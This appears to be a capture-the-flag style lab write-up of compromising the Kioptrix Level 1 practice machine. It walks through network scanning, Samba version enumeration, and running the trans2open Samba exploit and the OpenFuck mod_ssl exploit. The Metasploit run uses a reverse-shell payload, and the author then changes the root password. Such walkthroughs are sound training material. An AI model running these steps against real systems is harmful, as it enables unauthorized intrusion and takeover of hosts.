Information Gathering

To begin the assessment, I started with network discovery to identify potential targets within the local subnet. I used the ARP protocol to enumerate active devices:

arp-scan -l

From the results, I discovered the target machine with the IP address 192.168.133.141

Once the target was identified, I proceeded with a service and version detection scan using Nmap:

└─$ nmap -sV -O 192.168.133.141

The scan revealed six open ports running various services, including SSH, HTTP, HTTPS, RPC, NetBIOS, and Samba. Additionally, Nmap fingerprinting indicated the system was running Linux kernel 2.4.x, suggesting an older and potentially vulnerable operating system.

Samba Enumeration with Metasploit

After identifying that port 139/tcp (NetBIOS-SSN) was open, I decided to enumerate the Samba service to determine its exact version. This would help me confirm whether the service was vulnerable to known exploits.

Since Nmap did not reveal the version, I used Metasploit’s SMB scanner module:

Start Metasploit

└─$ msfconsole

Search for Samba-related modules

└─$ search samba

I am not found auxiliary but I search in google and find it with anther name

└─$ use auxiliary/scanner/smb/smb_version

I run command show options and I am find it want just ip of target

Set the target IP address

└─$ set RHOST 192.168.133.141

Run the module

└─$ run

Result:
Metasploit identified the target as running Samba 2.2.1a on Unix.

After discovering that the target is running Samba 2.2.1a, I used Searchsploit (the Exploit-DB command-line tool) to look for publicly available exploits related to this version.

└─$ searchsploit samba 2.2.1a

Searchsploit returned multiple results, including the well-known trans2open buffer overflow exploit:

Exploitation — Samba Remote Code Execution

The results showed a remote code execution exploit (trans2open overflow, CVE-2003-0201).

the fist exploit of samba 2.2.1a

Copy the Exploit Locally

└─$ searchsploit -m multiple/remote/10.c -o Desktop/10.c

This generated an executable named exploit

└─$ gcc Desktop/10.c -o exploit

After compiling the Samba exploit (10.c), I executed it against the target IP address using the following command:

└─$ ./exploit -b 0 192.168.133.141

Post-Exploitation: Gaining Root Access

Using the compiled Samba trans2open exploit, I successfully executed remote code and gained root access to the target machine.

Metasploit Exploitation of Samba 2.2.1a (CVE-2003–0201)

Using Metasploit, I exploited the vulnerable Samba service on port 139/tcp via the trans2open buffer overflow vulnerability.

Configuration Summary

└─$ use exploit/linux/samba/trans2open
└─$ set PAYLOAD linux/x86/shell_reverse_tcp
└─$ set RHOSTS 192.168.133.141
└─$ set RPORT 139
└─$ run

Execution Output

• Command shell sessions were successfully opened:
• Session 1: 192.168.133.141:1025
• Session 2: 192.168.133.141:1026
• Session 3: 192.168.133.141:1027
• Session 4: 192.168.133.141:1028

Privilege Verification

Inside the shell, I ran:

id

Output:

uid=0(root) gid=0(root) groups=99(nobody)

Confirmed root-level access.

Password Change (Post-Exploitation Step)

I attempted to change the root password:

passwd root
New password: 123
Retype new password: 123

Apache Enumeration & Remote Exploitatio

Target Information

• IP Address: 192.168.133.141
• Service Detected: Apache HTTP Server running on port 80
• SSL Service: OpenSSL via Apache mod_ssl module on port 443

Initial Enumeration

I began the enumeration by identifying open ports on the target machine. Port 80 (HTTP) was open, indicating a running web server. To discover hidden directories and files, I used the following tools:

└─$ dirb  http://192.168.133.141/
└─$ nikto -h http://192.168.133.141/

Result:
No interesting files, directories, or vulnerabilities were discovered through web enumeration.

SSL Vulnerability Discovery

Next, I investigated potential vulnerabilities in the Apache version and SSL module using Searchsploit:

searchsploit apache mod_ssl

Exploit Apache mod_ssl:

This revealed several known exploits for Apache mod_ssl, specifically for versions prior to 2.8.7 in combination with vulnerable versions of OpenSSL.

I selected the following exploit:

• Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
• CVE: CVE-2002–0082

Exploit Download & Compilation

I copied the exploit from ExploitDB using

└─$ searchsploit -m unix/remote/47080.c -o 47080.c

Compiled the exploit:

gcc 47080.c -o OpenFuck -lssl -lcrypto

Exploitation

Executed the compiled exploit against the target:

└─$ ./OpenFuck 0x6b 192.168.133.141 443 -c 10

• 0x6b is the target platform code (specific to the Linux/Apache/OpenSSL version).
• -c 50 sets the number of simultaneous connections.

Result:
Successfully gained a remote shell as the apache user:

Conclusion

This assessment demonstrates successful exploitation of the Kioptrix Level 1 machine through two critical vulnerabilities:

Vulnerabilities Exploited:

1- Samba 2.2.1a (CVE-2003–0201)

• Type: Remote Code Execution via trans2open buffer overflow
• Access Gained: root shell (UID 0)
• Tools Used: Metasploit + Manual Exploit (10.c)

2- Apache mod_ssl < 2.8.7 + OpenSSL (CVE-2002–0082)

• Type: Remote Buffer Overflow
• Access Gained: Limited shell as apache
• Exploit Used: OpenFuckV2.c